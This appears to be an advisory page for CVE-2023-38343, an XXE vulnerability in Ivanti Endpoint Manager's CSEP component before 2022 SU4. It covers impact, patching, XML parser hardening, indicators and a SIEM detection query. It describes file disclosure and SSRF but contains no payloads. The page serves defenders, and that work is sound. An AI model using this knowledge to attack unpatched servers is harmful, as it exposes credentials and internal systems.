CVE-2023-38343
📋 TL;DR
This XXE vulnerability in Ivanti Endpoint Manager's CSEP component allows attackers to read arbitrary files or perform SSRF attacks by exploiting improperly configured XML parsing. It affects Ivanti Endpoint Manager installations before 2022 SU4. Attackers could access sensitive system files or make internal network requests.
💻 Affected Systems
- Ivanti Endpoint Manager
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise through sensitive file disclosure (passwords, configuration files) leading to lateral movement or SSRF attacks against internal services.
Likely Case
Unauthorized file access to local system files, potentially exposing credentials, configuration data, or other sensitive information.
If Mitigated
Limited impact with proper network segmentation and access controls, though vulnerability still exists.
🎯 Exploit Status
XXE vulnerabilities are well-understood with public proof-of-concept available; exploitation requires XML input to vulnerable endpoint.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2022 SU4 or later
Vendor Advisory: https://www.ivanti.com/releases
Restart Required: Yes
Instructions:
1. Download Ivanti Endpoint Manager 2022 SU4 or later from Ivanti portal. 2. Backup current installation. 3. Apply the update following Ivanti's upgrade documentation. 4. Restart all Ivanti Endpoint Manager services.
🔧 Temporary Workarounds
Disable external entity processing
allConfigure XML parser to disable external entity resolution
Modify XML parser configuration to set features: FEATURE_SECURE_PROCESSING=true, disallow-doctype-decl=true
Input validation and filtering
allImplement strict input validation for XML content
Implement XML schema validation and filter DOCTYPE declarations
🧯 If You Can't Patch
- Implement network segmentation to isolate Ivanti Endpoint Manager from sensitive systems
- Deploy WAF with XXE protection rules and monitor for XML-based attacks
🔍 How to Verify
Check if Vulnerable:
Check Ivanti Endpoint Manager version via admin console or installation directory. Versions before 2022 SU4 are vulnerable.Check Version:
Check Ivanti console or installation properties for version informationVerify Fix Applied:
Verify version is 2022 SU4 or later and test XML processing endpoints with XXE payloads (in safe environment).📡 Detection & Monitoring
Log Indicators:
- Unusual XML processing errors
- File access attempts via XML parsing
- External entity resolution attempts
Network Indicators:
- HTTP requests with XML containing external entity references
- Unusual outbound connections from Ivanti server
SIEM Query:
source="ivanti*" AND (xml OR xxe OR doctype OR entity) AND (error OR exception OR access)